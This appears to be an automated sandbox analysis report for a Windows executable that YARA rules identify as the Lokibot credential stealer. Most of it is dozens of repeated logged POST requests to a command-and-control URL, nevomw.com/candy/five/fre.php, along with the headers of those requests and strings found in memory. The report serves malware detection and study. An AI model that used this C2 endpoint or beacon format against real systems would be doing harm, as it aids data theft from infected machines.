                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeCode function: 1_2_00404ED4 recv,1_2_00404ED4
                    Source: unknownDNS traffic detected: queries for: nevomw.com
                    Source: unknownHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 196Connection: close
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 02 Dec 2020 10:52:41 GMTContent-Type: text/html; charset=UTF-8Content-Length: 15Connection: closeX-Powered-By: PHP/7.4.10RC1Status: 404 Not FoundData Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.366875705.00000000062A0000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
                    Source: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000001.00000002.607462942.00000000004A0000.00000040.00000001.sdmpString found in binary or memory: http://nevomw.com/candy/five/fre.php
                    Source: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.363844302.0000000003341000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.366875705.00000000062A0000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                    Source: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.366875705.00000000062A0000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
                    Source: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.366875705.00000000062A0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
                    Source: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.366875705.00000000062A0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                    Source: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.366875705.00000000062A0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                    Source: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.366875705.00000000062A0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                    Source: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.366875705.00000000062A0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
                    Source: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.366875705.00000000062A0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                    Source: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.366875705.00000000062A0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                    Source: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.366875705.00000000062A0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                    Source: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.363372884.0000000001A07000.00000004.00000040.sdmpString found in binary or memory: http://www.fontbureau.coma
                    Source: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.363372884.0000000001A07000.00000004.00000040.sdmpString found in binary or memory: http://www.fontbureau.comai
                    Source: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.363372884.0000000001A07000.00000004.00000040.sdmpString found in binary or memory: http://www.fontbureau.comce9
                    Source: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.363372884.0000000001A07000.00000004.00000040.sdmpString found in binary or memory: http://www.fontbureau.comuec
                    Source: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.366875705.00000000062A0000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
                    Source: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.366875705.00000000062A0000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                    Source: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.366875705.00000000062A0000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                    Source: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.366875705.00000000062A0000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                    Source: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.366875705.00000000062A0000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                    Source: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.366875705.00000000062A0000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                    Source: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.366875705.00000000062A0000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
                    Source: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000001.00000002.607379742.0000000000400000.00000040.00000001.sdmpString found in binary or memory: http://www.ibsensoftware.com/
                    Source: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.366875705.00000000062A0000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                    Source: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.366875705.00000000062A0000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
                    Source: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.366875705.00000000062A0000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
                    Source: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.366875705.00000000062A0000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
                    Source: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.366875705.00000000062A0000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
                    Source: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.366875705.00000000062A0000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
                    Source: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.366875705.00000000062A0000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                    Source: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.366875705.00000000062A0000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn

                    System Summary:

                    barindex
                    Malicious sample detected (through community Yara rule)Show sources
                    Source: 00000000.00000002.363916312.00000000033BD000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000001.00000002.607379742.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
                    Source: 00000001.00000002.607379742.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000000.00000002.364641317.0000000004341000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                    Source: 1.2.SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
